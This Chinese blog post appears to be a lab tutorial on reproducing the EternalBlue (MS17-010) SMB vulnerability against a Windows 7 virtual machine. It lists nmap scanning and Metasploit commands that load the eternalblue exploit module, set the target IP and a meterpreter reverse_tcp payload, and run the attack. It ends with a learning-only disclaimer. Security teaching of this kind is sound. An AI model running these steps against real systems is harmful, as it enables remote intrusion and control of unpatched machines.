永恒之蓝--漏洞复现.

1.永恒之蓝简介

        永恒之蓝是在Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之蓝漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。                                                                                                                                 

2.环境准备

靶机:windows 7 (192.168.52.134)

攻击机:Kali Linux (192.168.52.129)

3.漏洞复现

用nmap扫描本网段下存活的主机

发现192.168.52.134,并且端口445目前是开启状态

使用kali自带的MSF的永恒之蓝漏洞模块,先对靶机进行扫描

打开MSF:msfconsole

 搜索永恒之蓝ms17-010代码:search ms17_010

auxiliary/scanner/smb/smb_ms17_010          是永恒之蓝扫描模块exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块

我们先对漏洞是否存在进行扫描                                                                                                      1.使用模块use exploit/windows/smb/ms17_010_eternalblue

2.设置靶机ip set rhosts 192.168.52.134

3.设置靶机端口 set rport 445(默认就是445)

4.输入show options查看配置

输入run开始操作

发现扫描结果信息(注:出现“+”号是存在的,“-”号是不存在,可能开启了防火墙或者已有补丁)

然后我们就可以利用漏洞,对靶机进行攻击

1.使用模块use exploit/windows/smb/ms17_010_eternalblue

2.设置靶机IP set rhosts 192.168.52.134

3.输入show options查看配置

 输入run开始攻击

 出现win就成功了,接下来我们就可以进行其他操作了

永恒之蓝(EternalBlue)是一个严重的安全漏洞,最初由美国国家安全局(NSA)发现,后来被黑客组织Shadow Brokers泄露。永恒之蓝利用了Windows SMB服务中的一个漏洞,允许攻击者远程执行代码。为了复现永恒之蓝漏洞在Ubuntu系统上的影响,通常需要设置一个实验环境。以下是复现永恒之蓝漏洞的基本步骤: ### 环境准备 1. **安装虚拟机**:使用VirtualBox或VMware安装两台虚拟机,一台运行Ubuntu,另一台运行Windows(建议使用Windows 7或Windows Server 2008,因为这些版本更容易受到永恒之蓝攻击)。 2. **网络配置**:确保两台虚拟机在同一局域网内,可以互相通信。 ### 步骤 1. **安装必要的软件**: - 在Ubuntu上安装Metasploit框架: ```bash sudo apt update sudo apt install metasploit-framework ``` - 在Windows虚拟机上禁用防火墙和防病毒软件,以确保攻击能够成功。 2. **启动Metasploit**: ```bash msfconsole ``` 3. **搜索永恒之蓝模块**: ```bash search eternalblue ``` 4. **使用永恒之蓝模块**: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` 5. **设置目标IP和本地IP**: ```bash set RHOST <Windows虚拟机IP> set LHOST <Ubuntu虚拟机IP> ``` 6. **选择Payload**: ```bash set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` 7. **执行攻击**: ```bash exploit ``` ### 结果 如果攻击成功,你将获得一个Meterpreter会话,可以远程执行命令和控制目标Windows系统。 ### 注意事项 - **法律和道德**:复现漏洞仅用于学习和研究目的,禁止在未经授权的系统上使用。 - **安全性**:在实际环境中,确保系统已安装最新的安全补丁,以防止此类漏洞被利用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值